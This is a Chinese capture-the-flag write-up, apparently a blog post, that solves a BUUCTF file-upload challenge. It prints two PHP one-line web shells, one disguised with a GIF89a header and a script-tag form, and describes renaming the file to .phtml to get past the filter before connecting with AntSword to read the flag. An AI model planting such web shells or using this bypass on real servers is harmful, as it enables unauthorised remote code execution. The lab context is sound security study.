BUUCTF——[极客大挑战 2019]Upload 1

本文详细描述了一种PHP文件上传的绕过方法,通过构造包含PHP代码的图片文件头来规避系统检测。作者首先尝试上传PHP后门,然后将其伪装成jpg格式,但被系统阻止。接着,通过在图片头添加PHP代码并避免使用`<?php`标签,成功创建了一个不被系统识别为PHP的文件。最终,该文件以.phtml后缀上传并执行,实现了远程连接。利用蚁剑工具,作者找到了隐藏的flag,并展示了出来。

1.打开后发现是文件上传题
构建一句话木马

<?php @eval($_POST['shy']);?>

将一句话木马改成jpg文件尝试上传。
抓包改成php
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
提示文件包含<?,那么我们有思路了,上传图片的时候还扫描了图片头,将一句话木马加图片头,并构建不包含<?>的一句话。

 GIF89a? 
 <script language="php">eval($_REQUEST[shell])</script>

在这里插入图片描述
抓包将jpg改为phtml后缀。
在这里插入图片描述
上传成功
在这里插入图片描述

用蚁剑连接
在这里插入图片描述
打开终端
在这里插入图片描述
使用cat命令查找flag
在这里插入图片描述

flag{d98de6c5-b03b-4f1b-bca6-7db9b2588f33}

评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值